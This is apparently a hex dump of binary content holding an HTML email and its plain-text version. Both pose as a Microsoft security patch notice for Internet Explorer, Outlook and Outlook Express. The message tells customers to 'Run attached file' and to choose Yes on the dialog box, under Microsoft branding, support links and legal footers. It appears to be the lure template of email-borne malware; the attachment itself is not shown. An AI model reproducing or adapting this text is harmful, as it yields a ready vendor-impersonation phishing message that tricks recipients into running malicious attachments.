00016f80  4f 4d 33 6d 4f 45 31 6c  71 45 33 6d 4f 45 76 56  |OM3mOE1lqE3mOEvV|
00016f90  4b 45 31 6c 70 37 78 56  4a 37 31 6c 4a 37 7a 6c  |KE1lp7xVJ71lJ7zl|
00016fa0  4a 37 78 56 4a 37 76 55  70 37 0d 0a 7a 6b 70 7a  |J7xVJ7vUp7..zkpz|
00016fb0  7a 6b 70 7a 78 56 4a 7a  72 55 70 72 76 55 4a 72  |zkpzxVJzrUprvUJr|
00016fc0  78 55 4a 72 76 55 4a 6a  74 54 70 6a 74 54 70 6a  |xUJrvUJjtTpjtTpj|
00016fd0  72 54 70 61 72 54 70 61  70 51 41 41 41 41 41 41  |rTparTpapQAAAAAA|
00016fe0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00016ff0  41 41 41 41 41 41 41 41  0d 0a 41 41 41 41 41 41  |AAAAAAAA..AAAAAA|
00017000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
00017020  41 41 41 41 41 41 41 43  77 41 41 41 41 41 44 41  |AAAAAAACwAAAAADA|
00017030  41 4d 41 41 41 49 6a 41  41 42 41 41 68 77 77 4d  |AMAAAIjAABAAhwwM|
00017040  47 46 43 78 41 51 0d 0a  43 41 43 77 6b 49 43 44  |GFCxAQ..CACwkICD|
00017050  44 42 59 53 4c 47 6a 51  77 51 45 42 68 67 38 7a  |DBYSLGjQwQEBhg8z|
00017060  44 42 41 49 59 49 45 49  42 77 49 51 64 4c 6a 41  |DBAIYIEIBwIQdLjA|
00017070  6f 4f 4f 46 67 53 46 4d  49 49 43 77 49 55 4d 45  |oOOFgSFMIICwIUME|
00017080  41 78 51 77 43 42 78 68  41 67 4b 48 44 68 35 43  |AxQwCBxhAgKHDh5C|
00017090  36 44 51 41 0d 0a 49 49  47 4a 45 79 41 34 66 50  |6DQA..IIGJEyA4fP|
000170a0  41 77 59 6f 51 43 41 41  56 4b 6f 45 67 42 51 73  |AwYoQCAAVKoEgBQs|
000170b0  4b 4a 45 69 64 51 38 43  79 52 59 75 6d 44 41 31  |KJEidQ8CyRYumDA1|
000170c0  56 54 71 4e 42 51 51 59  58 58 46 51 6f 66 73 50  |VTqNBQQYXXFQofsP|
000170d0  42 36 41 49 41 4b 46 69  77 65 4e 42 54 4c 6f 69  |B6AIAKFiweNBTLoi|
000170e0  7a 61 0d 0a 42 78 63 46  43 6a 67 77 67 51 53 4a  |za..BxcFCjgwgQSJ|
000170f0  43 51 63 57 43 67 67 49  41 44 73 3d 00 00 00 00  |CQcWCggIADs=....|
00017100  3c 2f 46 4f 4e 54 3e 3c  2f 54 44 3e 3c 2f 54 52  |</FONT></TD></TR|
00017110  3e 0d 0a 3c 2f 54 41 42  4c 45 3e 0d 0a 0d 0a 3c  |>..</TABLE>....<|
00017120  42 52 3e 3c 42 52 3e 0d  0a 3c 54 41 42 4c 45 20  |BR><BR>..<TABLE |
00017130  42 4f 52 44 45 52 3d 33  44 22 31 22 20 43 45 4c  |BORDER=3D"1" CEL|
00017140  4c 53 50 41 43 49 4e 47  3d 33 44 22 31 22 20 43  |LSPACING=3D"1" C|
00017150  45 4c 4c 50 41 44 44 49  4e 47 3d 33 44 22 33 22  |ELLPADDING=3D"3"|
00017160  20 57 49 44 54 48 3d 33  44 22 36 30 30 22 3e 0d  | WIDTH=3D"600">.|
00017170  0a 3c 54 52 20 56 41 4c  49 47 4e 3d 33 44 22 54  |.<TR VALIGN=3D"T|
00017180  4f 50 22 3e 0d 0a 3c 54  44 20 4e 4f 57 52 41 50  |OP">..<TD NOWRAP|
00017190  3e 3c 46 4f 4e 54 20 53  49 5a 45 3d 33 44 22 31  |><FONT SIZE=3D"1|
000171a0  22 3e 3c 42 3e 3c 49 4d  47 20 53 52 43 3d 33 44  |"><B><IMG SRC=3D|
000171b0  22 63 69 64 3a 36 34 34  37 38 32 31 22 20 3d 0d  |"cid:6447821" =.|
000171c0  0a 41 4c 49 47 4e 3d 33  44 22 61 62 73 6d 69 64  |.ALIGN=3D"absmid|
000171d0  64 6c 65 22 20 42 4f 52  44 45 52 3d 33 44 22 30  |dle" BORDER=3D"0|
000171e0  22 3e 26 6e 62 73 70 3b  53 79 73 74 65 6d 20 72  |">&nbsp;System r|
000171f0  65 71 75 69 72 65 6d 65  6e 74 73 3c 2f 42 3e 0d  |equirements</B>.|
00017200  0a 3c 2f 46 4f 4e 54 3e  3c 2f 54 44 3e 0d 0a 3c  |.</FONT></TD>..<|
00017210  54 44 20 4e 4f 57 52 41  50 3e 3c 46 4f 4e 54 20  |TD NOWRAP><FONT |
00017220  53 49 5a 45 3d 33 44 22  31 22 3e 57 69 6e 64 6f  |SIZE=3D"1">Windo|
00017230  77 73 20 39 35 2f 39 38  2f 4d 65 2f 32 30 30 30  |ws 95/98/Me/2000|
00017240  2f 4e 54 2f 58 50 3c 2f  46 4f 4e 54 3e 3c 2f 54  |/NT/XP</FONT></T|
00017250  44 3e 0d 0a 3c 2f 54 52  3e 0d 0a 0d 0a 3c 54 52  |D>..</TR>....<TR|
00017260  20 56 41 4c 49 47 4e 3d  33 44 22 54 4f 50 22 3e  | VALIGN=3D"TOP">|
00017270  0d 0a 3c 54 44 20 4e 4f  57 52 41 50 3e 3c 46 4f  |..<TD NOWRAP><FO|
00017280  4e 54 20 53 49 5a 45 3d  33 44 22 31 22 3e 3c 42  |NT SIZE=3D"1"><B|
00017290  3e 3c 49 4d 47 20 53 52  43 3d 33 44 22 63 69 64  |><IMG SRC=3D"cid|
000172a0  3a 36 34 34 37 38 32 31  22 20 3d 0d 0a 41 4c 49  |:6447821" =..ALI|
000172b0  47 4e 3d 33 44 22 61 62  73 6d 69 64 64 6c 65 22  |GN=3D"absmiddle"|
000172c0  20 42 4f 52 44 45 52 3d  33 44 22 30 22 3e 26 6e  | BORDER=3D"0">&n|
000172d0  62 73 70 3b 54 68 69 73  20 75 70 64 61 74 65 20  |bsp;This update |
000172e0  61 70 70 6c 69 65 73 20  74 6f 3c 2f 42 3e 0d 0a  |applies to</B>..|
000172f0  3c 2f 46 4f 4e 54 3e 3c  2f 54 44 3e 3c 54 44 20  |</FONT></TD><TD |
00017300  4e 4f 57 52 41 50 3e 0d  0a 3c 46 4f 4e 54 20 53  |NOWRAP>..<FONT S|
00017310  49 5a 45 3d 33 44 22 31  22 3e 0d 0a 4d 53 20 49  |IZE=3D"1">..MS I|
00017320  6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72  |nternet Explorer|
00017330  2c 20 76 65 72 73 69 6f  6e 20 34 2e 30 31 20 61  |, version 4.01 a|
00017340  6e 64 20 6c 61 74 65 72  3c 42 52 3e 0d 0a 4d 53  |nd later<BR>..MS|
00017350  20 4f 75 74 6c 6f 6f 6b  2c 20 76 65 72 73 69 6f  | Outlook, versio|
00017360  6e 20 38 2e 30 30 20 61  6e 64 20 6c 61 74 65 72  |n 8.00 and later|
00017370  3c 42 52 3e 0d 0a 4d 53  20 4f 75 74 6c 6f 6f 6b  |<BR>..MS Outlook|
00017380  20 45 78 70 72 65 73 73  2c 20 76 65 72 73 69 6f  | Express, versio|
00017390  6e 20 34 2e 30 31 20 61  6e 64 20 6c 61 74 65 72  |n 4.01 and later|
000173a0  0d 0a 3c 2f 46 4f 4e 54  3e 0d 0a 3c 2f 54 44 3e  |..</FONT>..</TD>|
000173b0  0d 0a 3c 2f 54 52 3e 0d  0a 0d 0a 3c 54 52 20 56  |..</TR>....<TR V|
000173c0  41 4c 49 47 4e 3d 33 44  22 54 4f 50 22 3e 0d 0a  |ALIGN=3D"TOP">..|
000173d0  3c 54 44 20 4e 4f 57 52  41 50 3e 3c 46 4f 4e 54  |<TD NOWRAP><FONT|
000173e0  20 53 49 5a 45 3d 33 44  22 31 22 3e 3c 42 3e 3c  | SIZE=3D"1"><B><|
000173f0  49 4d 47 20 53 52 43 3d  33 44 22 63 69 64 3a 36  |IMG SRC=3D"cid:6|
00017400  34 34 37 38 32 31 22 20  3d 0d 0a 41 4c 49 47 4e  |447821" =..ALIGN|
00017410  3d 33 44 22 61 62 73 6d  69 64 64 6c 65 22 20 42  |=3D"absmiddle" B|
00017420  4f 52 44 45 52 3d 33 44  22 30 22 3e 26 6e 62 73  |ORDER=3D"0">&nbs|
00017430  70 3b 52 65 63 6f 6d 6d  65 6e 64 61 74 69 6f 6e  |p;Recommendation|
00017440  3c 2f 42 3e 3c 2f 46 4f  4e 54 3e 3c 2f 54 44 3e  |</B></FONT></TD>|
00017450  0d 0a 3c 54 44 20 4e 4f  57 52 41 50 3e 3c 46 4f  |..<TD NOWRAP><FO|
00017460  4e 54 20 53 49 5a 45 3d  33 44 22 31 22 3e 43 75  |NT SIZE=3D"1">Cu|
00017470  73 74 6f 6d 65 72 73 20  73 68 6f 75 6c 64 20 69  |stomers should i|
00017480  6e 73 74 61 6c 6c 20 74  68 65 20 70 61 74 63 68  |nstall the patch|
00017490  20 3d 0d 0a 61 74 20 74  68 65 20 65 61 72 6c 69  | =..at the earli|
000174a0  65 73 74 20 6f 70 70 6f  72 74 75 6e 69 74 79 2e  |est opportunity.|
000174b0  3c 2f 46 4f 4e 54 3e 3c  2f 54 44 3e 0d 0a 3c 2f  |</FONT></TD>..</|
000174c0  54 52 3e 0d 0a 0d 0a 3c  54 52 20 56 41 4c 49 47  |TR>....<TR VALIG|
000174d0  4e 3d 33 44 22 54 4f 50  22 3e 0d 0a 3c 54 44 20  |N=3D"TOP">..<TD |
000174e0  4e 4f 57 52 41 50 3e 3c  46 4f 4e 54 20 53 49 5a  |NOWRAP><FONT SIZ|
000174f0  45 3d 33 44 22 31 22 3e  3c 42 3e 3c 49 4d 47 20  |E=3D"1"><B><IMG |
00017500  53 52 43 3d 33 44 22 63  69 64 3a 36 34 34 37 38  |SRC=3D"cid:64478|
00017510  32 31 22 20 3d 0d 0a 41  4c 49 47 4e 3d 33 44 22  |21" =..ALIGN=3D"|
00017520  61 62 73 6d 69 64 64 6c  65 22 20 42 4f 52 44 45  |absmiddle" BORDE|
00017530  52 3d 33 44 22 30 22 3e  26 6e 62 73 70 3b 48 6f  |R=3D"0">&nbsp;Ho|
00017540  77 20 74 6f 20 69 6e 73  74 61 6c 6c 3c 2f 42 3e  |w to install</B>|
00017550  3c 2f 46 4f 4e 54 3e 3c  2f 54 44 3e 0d 0a 3c 54  |</FONT></TD>..<T|
00017560  44 20 4e 4f 57 52 41 50  3e 3c 46 4f 4e 54 20 53  |D NOWRAP><FONT S|
00017570  49 5a 45 3d 33 44 22 31  22 3e 52 75 6e 20 61 74  |IZE=3D"1">Run at|
00017580  74 61 63 68 65 64 20 66  69 6c 65 2e 20 3d 0d 0a  |tached file. =..|
00017590  43 68 6f 6f 73 65 20 59  65 73 20 6f 6e 20 64 69  |Choose Yes on di|
000175a0  73 70 6c 61 79 65 64 20  64 69 61 6c 6f 67 20 62  |splayed dialog b|
000175b0  6f 78 2e 3c 2f 46 4f 4e  54 3e 3c 2f 54 44 3e 0d  |ox.</FONT></TD>.|
000175c0  0a 3c 2f 54 52 3e 0d 0a  0d 0a 3c 54 52 20 56 41  |.</TR>....<TR VA|
000175d0  4c 49 47 4e 3d 33 44 22  54 4f 50 22 3e 0d 0a 3c  |LIGN=3D"TOP">..<|
000175e0  54 44 20 4e 4f 57 52 41  50 3e 3c 46 4f 4e 54 20  |TD NOWRAP><FONT |
000175f0  53 49 5a 45 3d 33 44 22  31 22 3e 3c 42 3e 3c 49  |SIZE=3D"1"><B><I|
00017600  4d 47 20 53 52 43 3d 33  44 22 63 69 64 3a 36 34  |MG SRC=3D"cid:64|
00017610  34 37 38 32 31 22 20 3d  0d 0a 41 4c 49 47 4e 3d  |47821" =..ALIGN=|
00017620  33 44 22 61 62 73 6d 69  64 64 6c 65 22 20 42 4f  |3D"absmiddle" BO|
00017630  52 44 45 52 3d 33 44 22  30 22 3e 26 6e 62 73 70  |RDER=3D"0">&nbsp|
00017640  3b 48 6f 77 20 74 6f 20  75 73 65 3c 2f 42 3e 3c  |;How to use</B><|
00017650  2f 46 4f 4e 54 3e 3c 2f  54 44 3e 0d 0a 3c 54 44  |/FONT></TD>..<TD|
00017660  20 4e 4f 57 52 41 50 3e  3c 46 4f 4e 54 20 53 49  | NOWRAP><FONT SI|
00017670  5a 45 3d 33 44 22 31 22  3e 59 6f 75 20 64 6f 6e  |ZE=3D"1">You don|
00017680  27 74 20 6e 65 65 64 20  74 6f 20 64 6f 20 3d 0d  |'t need to do =.|
00017690  0a 61 6e 79 74 68 69 6e  67 20 61 66 74 65 72 20  |.anything after |
000176a0  69 6e 73 74 61 6c 6c 69  6e 67 20 74 68 69 73 20  |installing this |
000176b0  69 74 65 6d 2e 3c 2f 46  4f 4e 54 3e 3c 2f 54 44  |item.</FONT></TD|
000176c0  3e 0d 0a 3c 2f 54 52 3e  0d 0a 3c 2f 54 41 42 4c  |>..</TR>..</TABL|
000176d0  45 3e 0d 0a 3c 42 52 3e  0d 0a 0d 0a 3c 54 41 42  |E>..<BR>....<TAB|
000176e0  4c 45 20 57 49 44 54 48  3d 33 44 22 36 30 30 22  |LE WIDTH=3D"600"|
000176f0  3e 3c 54 52 3e 3c 54 44  3e 3c 46 4f 4e 54 20 53  |><TR><TD><FONT S|
00017700  49 5a 45 3d 33 44 22 32  22 3e 0d 0a 4d 69 63 72  |IZE=3D"2">..Micr|
00017710  6f 73 6f 66 74 20 50 72  6f 64 75 63 74 20 53 75  |osoft Product Su|
00017720  70 70 6f 72 74 20 53 65  72 76 69 63 65 73 20 61  |pport Services a|
00017730  6e 64 20 4b 6e 6f 77 6c  65 64 67 65 20 42 61 73  |nd Knowledge Bas|
00017740  65 20 61 72 74 69 63 6c  65 73 0d 0a 63 61 6e 20  |e articles..can |
00017750  62 65 20 66 6f 75 6e 64  20 6f 6e 20 74 68 65 20  |be found on the |
00017760  3c 41 20 48 52 45 46 3d  33 44 22 68 74 74 70 3a  |<A HREF=3D"http:|
00017770  2f 2f 73 75 70 70 6f 72  74 2e 6d 69 63 72 6f 73  |//support.micros|
00017780  6f 66 74 2e 63 6f 6d 2f  22 20 3d 0d 0a 54 41 52  |oft.com/" =..TAR|
00017790  47 45 54 3d 33 44 22 5f  74 6f 70 22 3e 4d 69 63  |GET=3D"_top">Mic|
000177a0  72 6f 73 6f 66 74 20 54  65 63 68 6e 69 63 61 6c  |rosoft Technical|
000177b0  20 53 75 70 70 6f 72 74  3c 2f 41 3e 20 77 65 62  | Support</A> web|
000177c0  20 73 69 74 65 2e 20 3d  0d 0a 46 6f 72 20 73 65  | site. =..For se|
000177d0  63 75 72 69 74 79 2d 72  65 6c 61 74 65 64 20 69  |curity-related i|
000177e0  6e 66 6f 72 6d 61 74 69  6f 6e 20 61 62 6f 75 74  |nformation about|
000177f0  20 4d 69 63 72 6f 73 6f  66 74 20 70 72 6f 64 75  | Microsoft produ|
00017800  63 74 73 2c 20 70 6c 65  61 73 65 20 3d 0d 0a 76  |cts, please =..v|
00017810  69 73 69 74 20 74 68 65  20 3c 41 20 48 52 45 46  |isit the <A HREF|
00017820  3d 33 44 22 68 74 74 70  3a 2f 2f 77 77 77 2e 6d  |=3D"http://www.m|
00017830  69 63 72 6f 73 6f 66 74  2e 63 6f 6d 2f 73 65 63  |icrosoft.com/sec|
00017840  75 72 69 74 79 22 20 54  41 52 47 45 54 3d 33 44  |urity" TARGET=3D|
00017850  22 5f 74 6f 70 22 3e 0d  0a 4d 69 63 72 6f 73 6f  |"_top">..Microso|
00017860  66 74 20 53 65 63 75 72  69 74 79 20 41 64 76 69  |ft Security Advi|
00017870  73 6f 72 3c 2f 41 3e 20  77 65 62 20 73 69 74 65  |sor</A> web site|
00017880  2c 20 3d 0d 0a 6f 72 20  3c 41 20 48 52 45 46 3d  |, =..or <A HREF=|
00017890  33 44 22 68 74 74 70 3a  2f 2f 77 77 77 2e 6d 69  |3D"http://www.mi|
000178a0  63 72 6f 73 6f 66 74 2e  63 6f 6d 2f 63 6f 6e 74  |crosoft.com/cont|
000178b0  61 63 74 75 73 2f 63 6f  6e 74 61 63 74 75 73 2e  |actus/contactus.|
000178c0  61 73 70 22 20 3d 0d 0a  54 41 52 47 45 54 3d 33  |asp" =..TARGET=3|
000178d0  44 22 5f 74 6f 70 22 3e  43 6f 6e 74 61 63 74 20  |D"_top">Contact |
000178e0  55 73 2e 3c 2f 41 3e 0d  0a 3c 42 52 3e 3c 42 52  |Us.</A>..<BR><BR|
000178f0  3e 0d 0a 54 68 61 6e 6b  20 79 6f 75 20 66 6f 72  |>..Thank you for|
00017900  20 75 73 69 6e 67 20 4d  69 63 72 6f 73 6f 66 74  | using Microsoft|
00017910  20 70 72 6f 64 75 63 74  73 2e 3c 42 52 3e 3c 42  | products.<BR><B|
00017920  52 3e 3c 2f 46 4f 4e 54  3e 0d 0a 3c 46 4f 4e 54  |R></FONT>..<FONT|
00017930  20 53 49 5a 45 3d 33 44  22 31 22 3e 50 6c 65 61  | SIZE=3D"1">Plea|
00017940  73 65 20 64 6f 20 6e 6f  74 20 72 65 70 6c 79 20  |se do not reply |
00017950  74 6f 20 74 68 69 73 20  6d 65 73 73 61 67 65 2e  |to this message.|
00017960  20 3d 0d 0a 49 74 20 77  61 73 20 73 65 6e 74 20  | =..It was sent |
00017970  66 72 6f 6d 20 61 6e 20  75 6e 6d 6f 6e 69 74 6f  |from an unmonito|
00017980  72 65 64 20 65 2d 6d 61  69 6c 20 61 64 64 72 65  |red e-mail addre|
00017990  73 73 20 61 6e 64 20 77  65 20 61 72 65 20 75 6e  |ss and we are un|
000179a0  61 62 6c 65 20 3d 0d 0a  74 6f 20 72 65 73 70 6f  |able =..to respo|
000179b0  6e 64 20 74 6f 20 61 6e  79 20 72 65 70 6c 69 65  |nd to any replie|
000179c0  73 2e 3c 42 52 3e 3c 2f  46 4f 4e 54 3e 0d 0a 0d  |s.<BR></FONT>...|
000179d0  0a 3c 48 52 20 43 4f 4c  4f 52 3d 33 44 22 53 69  |.<HR COLOR=3D"Si|
000179e0  6c 76 65 72 22 20 53 49  5a 45 3d 33 44 22 31 22  |lver" SIZE=3D"1"|
000179f0  20 57 49 44 54 48 3d 33  44 22 31 30 30 25 22 3e  | WIDTH=3D"100%">|
00017a00  0d 0a 3c 46 4f 4e 54 20  53 49 5a 45 3d 33 44 22  |..<FONT SIZE=3D"|
00017a10  31 22 20 43 4f 4c 4f 52  3d 33 44 22 47 72 61 79  |1" COLOR=3D"Gray|
00017a20  22 3e 54 68 65 20 6e 61  6d 65 73 20 6f 66 20 74  |">The names of t|
00017a30  68 65 20 61 63 74 75 61  6c 20 63 6f 6d 70 61 6e  |he actual compan|
00017a40  69 65 73 20 61 6e 64 20  3d 0d 0a 70 72 6f 64 75  |ies and =..produ|
00017a50  63 74 73 20 6d 65 6e 74  69 6f 6e 65 64 20 68 65  |cts mentioned he|
00017a60  72 65 69 6e 20 61 72 65  20 74 68 65 20 74 72 61  |rein are the tra|
00017a70  64 65 6d 61 72 6b 73 20  3d 0d 0a 6f 66 20 74 68  |demarks =..of th|
00017a80  65 69 72 20 72 65 73 70  65 63 74 69 76 65 20 6f  |eir respective o|
00017a90  77 6e 65 72 73 2e 3c 2f  46 4f 4e 54 3e 0d 0a 3c  |wners.</FONT>..<|
00017aa0  2f 54 44 3e 3c 2f 54 52  3e 3c 2f 54 41 42 4c 45  |/TD></TR></TABLE|
00017ab0  3e 0d 0a 0d 0a 3c 42 52  3e 0d 0a 3c 54 41 42 4c  |>....<BR>..<TABL|
00017ac0  45 20 57 49 44 54 48 3d  33 44 22 36 30 30 22 20  |E WIDTH=3D"600" |
00017ad0  48 45 49 47 48 54 3d 33  44 22 34 35 22 20 42 47  |HEIGHT=3D"45" BG|
00017ae0  43 4f 4c 4f 52 3d 33 44  22 23 31 34 37 38 45 42  |COLOR=3D"#1478EB|
00017af0  22 3e 0d 0a 3c 54 52 20  56 41 4c 49 47 4e 3d 33  |">..<TR VALIGN=3|
00017b00  44 22 54 4f 50 22 3e 0d  0a 3c 54 44 20 57 49 44  |D"TOP">..<TD WID|
00017b10  54 48 3d 33 44 22 35 22  3e 3c 2f 54 44 3e 0d 0a  |TH=3D"5"></TD>..|
00017b20  3c 54 44 3e 0d 0a 3c 46  4f 4e 54 20 43 4f 4c 4f  |<TD>..<FONT COLO|
00017b30  52 3d 33 44 22 23 46 46  46 46 46 46 22 20 53 49  |R=3D"#FFFFFF" SI|
00017b40  5a 45 3d 33 44 22 31 22  3e 3c 42 3e 0d 0a 3c 41  |ZE=3D"1"><B>..<A|
00017b50  20 63 6c 61 73 73 3d 33  44 27 6e 61 76 74 65 78  | class=3D'navtex|
00017b60  74 27 20 48 52 45 46 3d  33 44 22 68 74 74 70 3a  |t' HREF=3D"http:|
00017b70  2f 2f 77 77 77 2e 6d 69  63 72 6f 73 6f 66 74 2e  |//www.microsoft.|
00017b80  63 6f 6d 2f 3d 0d 0a 63  6f 6e 74 61 63 74 75 73  |com/=..contactus|
00017b90  2f 63 6f 6e 74 61 63 74  75 73 2e 61 73 70 22 20  |/contactus.asp" |
00017ba0  54 41 52 47 45 54 3d 33  44 22 5f 74 6f 70 22 3e  |TARGET=3D"_top">|
00017bb0  43 6f 6e 74 61 63 74 20  55 73 3c 2f 41 3e 0d 0a  |Contact Us</A>..|
00017bc0  26 6e 62 73 70 3b 7c 26  6e 62 73 70 3b 0d 0a 3c  |&nbsp;|&nbsp;..<|
00017bd0  41 20 63 6c 61 73 73 3d  33 44 27 6e 61 76 74 65  |A class=3D'navte|
00017be0  78 74 27 20 48 52 45 46  3d 33 44 22 68 74 74 70  |xt' HREF=3D"http|
00017bf0  3a 2f 2f 77 77 77 2e 6d  69 63 72 6f 73 6f 66 74  |://www.microsoft|
00017c00  2e 63 6f 6d 2f 6c 65 67  61 6c 2f 22 20 3d 0d 0a  |.com/legal/" =..|
00017c10  54 41 52 47 45 54 3d 33  44 22 5f 74 6f 70 22 3e  |TARGET=3D"_top">|
00017c20  4c 65 67 61 6c 3c 2f 41  3e 0d 0a 26 6e 62 73 70  |Legal</A>..&nbsp|
00017c30  3b 7c 26 6e 62 73 70 3b  0d 0a 3c 41 20 63 6c 61  |;|&nbsp;..<A cla|
00017c40  73 73 3d 33 44 27 6e 61  76 74 65 78 74 27 20 48  |ss=3D'navtext' H|
00017c50  52 45 46 3d 33 44 22 68  74 74 70 73 3a 2f 2f 77  |REF=3D"https://w|
00017c60  77 77 2e 74 72 75 73 74  65 2e 6f 72 67 2f 76 61  |ww.truste.org/va|
00017c70  6c 69 64 61 74 65 2f 36  30 35 22 20 3d 0d 0a 54  |lidate/605" =..T|
00017c80  41 52 47 45 54 3d 33 44  22 5f 74 6f 70 22 20 54  |ARGET=3D"_top" T|
00017c90  49 54 4c 45 3d 33 44 22  54 52 55 53 54 65 20 2d  |ITLE=3D"TRUSTe -|
00017ca0  20 43 6c 69 63 6b 20 74  6f 20 56 65 72 69 66 79  | Click to Verify|
00017cb0  22 3e 54 52 55 53 54 65  3c 2f 41 3e 0d 0a 3c 2f  |">TRUSTe</A>..</|
00017cc0  46 4f 4e 54 3e 3c 2f 42  3e 0d 0a 3c 2f 54 44 3e  |FONT></B>..</TD>|
00017cd0  0d 0a 3c 2f 54 52 3e 0d  0a 0d 0a 3c 54 52 20 56  |..</TR>....<TR V|
00017ce0  41 4c 49 47 4e 3d 33 44  22 4d 49 44 44 4c 45 22  |ALIGN=3D"MIDDLE"|
00017cf0  3e 0d 0a 3c 54 44 20 57  49 44 54 48 3d 33 44 22  |>..<TD WIDTH=3D"|
00017d00  35 22 3e 3c 2f 54 44 3e  0d 0a 3c 54 44 3e 0d 0a  |5"></TD>..<TD>..|
00017d10  3c 46 4f 4e 54 20 43 4f  4c 4f 52 3d 33 44 22 23  |<FONT COLOR=3D"#|
00017d20  46 46 46 46 46 46 22 20  53 49 5a 45 3d 33 44 22  |FFFFFF" SIZE=3D"|
00017d30  31 22 3e 0d 0a 26 63 6f  70 79 3b 00 00 00 00 00  |1">..&copy;.....|
00017d40  0d 0a 53 79 73 74 65 6d  20 72 65 71 75 69 72 65  |..System require|
00017d50  6d 65 6e 74 73 3a 20 57  69 6e 64 6f 77 73 20 39  |ments: Windows 9|
00017d60  35 2f 39 38 2f 4d 65 2f  32 30 30 30 2f 4e 54 2f  |5/98/Me/2000/NT/|
00017d70  58 50 0d 0a 54 68 69 73  20 75 70 64 61 74 65 20  |XP..This update |
00017d80  61 70 70 6c 69 65 73 20  74 6f 3a 0d 0a 20 2d 20  |applies to:.. - |
00017d90  4d 53 20 49 6e 74 65 72  6e 65 74 20 45 78 70 6c  |MS Internet Expl|
00017da0  6f 72 65 72 2c 20 76 65  72 73 69 6f 6e 20 34 2e  |orer, version 4.|
00017db0  30 31 20 61 6e 64 20 6c  61 74 65 72 0d 0a 20 2d  |01 and later.. -|
00017dc0  20 4d 53 20 4f 75 74 6c  6f 6f 6b 2c 20 76 65 72  | MS Outlook, ver|
00017dd0  73 69 6f 6e 20 38 2e 30  30 20 61 6e 64 20 6c 61  |sion 8.00 and la|
00017de0  74 65 72 0d 0a 20 2d 20  4d 53 20 4f 75 74 6c 6f  |ter.. - MS Outlo|
00017df0  6f 6b 20 45 78 70 72 65  73 73 2c 20 76 65 72 73  |ok Express, vers|
00017e00  69 6f 6e 20 34 2e 30 31  20 61 6e 64 20 6c 61 74  |ion 4.01 and lat|
00017e10  65 72 0d 0a 0d 0a 52 65  63 6f 6d 6d 65 6e 64 61  |er....Recommenda|
00017e20  74 69 6f 6e 3a 20 43 75  73 74 6f 6d 65 72 73 20  |tion: Customers |
00017e30  73 68 6f 75 6c 64 20 69  6e 73 74 61 6c 6c 20 74  |should install t|
00017e40  68 65 20 70 61 74 63 68  20 3d 0d 0a 61 74 20 74  |he patch =..at t|
00017e50  68 65 20 65 61 72 6c 69  65 73 74 20 6f 70 70 6f  |he earliest oppo|
00017e60  72 74 75 6e 69 74 79 2e  0d 0a 48 6f 77 20 74 6f  |rtunity...How to|
00017e70  20 69 6e 73 74 61 6c 6c  3a 20 52 75 6e 20 61 74  | install: Run at|
00017e80  74 61 63 68 65 64 20 66  69 6c 65 2e 20 43 68 6f  |tached file. Cho|
00017e90  6f 73 65 20 59 65 73 20  6f 6e 20 64 69 73 70 6c  |ose Yes on displ|
00017ea0  61 79 65 64 20 64 69 61  6c 6f 67 20 62 6f 78 2e  |ayed dialog box.|
00017eb0  0d 0a 48 6f 77 20 74 6f  20 75 73 65 3a 20 59 6f  |..How to use: Yo|
00017ec0  75 20 64 6f 6e 27 74 20  6e 65 65 64 20 74 6f 20  |u don't need to |
00017ed0  64 6f 20 61 6e 79 74 68  69 6e 67 20 61 66 74 65  |do anything afte|
00017ee0  72 20 69 6e 73 74 61 6c  6c 69 6e 67 20 74 68 69  |r installing thi|
00017ef0  73 20 69 74 65 6d 2e 0d  0a 00 00 00 00 00 00 00  |s item..........|
00017f00  0d 0a 0d 0a 4d 69 63 72  6f 73 6f 66 74 20 50 72  |....Microsoft Pr|
00017f10  6f 64 75 63 74 20 53 75  70 70 6f 72 74 20 53 65  |oduct Support Se|
00017f20  72 76 69 63 65 73 20 61  6e 64 20 4b 6e 6f 77 6c  |rvices and Knowl|
00017f30  65 64 67 65 20 42 61 73  65 20 61 72 74 69 63 6c  |edge Base articl|
00017f40  65 73 20 3d 0d 0a 63 61  6e 20 62 65 20 66 6f 75  |es =..can be fou|
00017f50  6e 64 20 6f 6e 20 74 68  65 20 4d 69 63 72 6f 73  |nd on the Micros|
00017f60  6f 66 74 20 54 65 63 68  6e 69 63 61 6c 20 53 75  |oft Technical Su|
00017f70  70 70 6f 72 74 20 77 65  62 20 73 69 74 65 2e 0d  |pport web site..|
00017f80  0a 68 74 74 70 3a 2f 2f  73 75 70 70 6f 72 74 2e  |.http://support.|
00017f90  6d 69 63 72 6f 73 6f 66  74 2e 63 6f 6d 2f 0d 0a  |microsoft.com/..|
00017fa0  0d 0a 46 6f 72 20 73 65  63 75 72 69 74 79 2d 72  |..For security-r|
00017fb0  65 6c 61 74 65 64 20 69  6e 66 6f 72 6d 61 74 69  |elated informati|
00017fc0  6f 6e 20 61 62 6f 75 74  20 4d 69 63 72 6f 73 6f  |on about Microso|
00017fd0  66 74 20 70 72 6f 64 75  63 74 73 2c 20 70 6c 65  |ft products, ple|
00017fe0  61 73 65 20 3d 0d 0a 76  69 73 69 74 20 74 68 65  |ase =..visit the|
00017ff0  20 4d 69 63 72 6f 73 6f  66 74 20 53 65 63 75 72  | Microsoft Secur|
00018000  69 74 79 20 41 64 76 69  73 6f 72 20 77 65 62 20  |ity Advisor web |
00018010  73 69 74 65 0d 0a 68 74  74 70 3a 2f 2f 77 77 77  |site..http://www|
00018020  2e 6d 69 63 72 6f 73 6f  66 74 2e 63 6f 6d 2f 73  |.microsoft.com/s|
00018030  65 63 75 72 69 74 79 2f  0d 0a 0d 0a 54 68 61 6e  |ecurity/....Than|
00018040  6b 20 79 6f 75 20 66 6f  72 20 75 73 69 6e 67 20  |k you for using |
00018050  4d 69 63 72 6f 73 6f 66  74 20 70 72 6f 64 75 63  |Microsoft produc|
00018060  74 73 2e 0d 0a 0d 0a 50  6c 65 61 73 65 20 64 6f  |ts.....Please do|
00018070  20 6e 6f 74 20 72 65 70  6c 79 20 74 6f 20 74 68  | not reply to th|
00018080  69 73 20 6d 65 73 73 61  67 65 2e 0d 0a 49 74 20  |is message...It |
00018090  77 61 73 20 73 65 6e 74  20 66 72 6f 6d 20 61 6e  |was sent from an|
000180a0  20 75 6e 6d 6f 6e 69 74  6f 72 65 64 20 65 2d 6d  | unmonitored e-m|
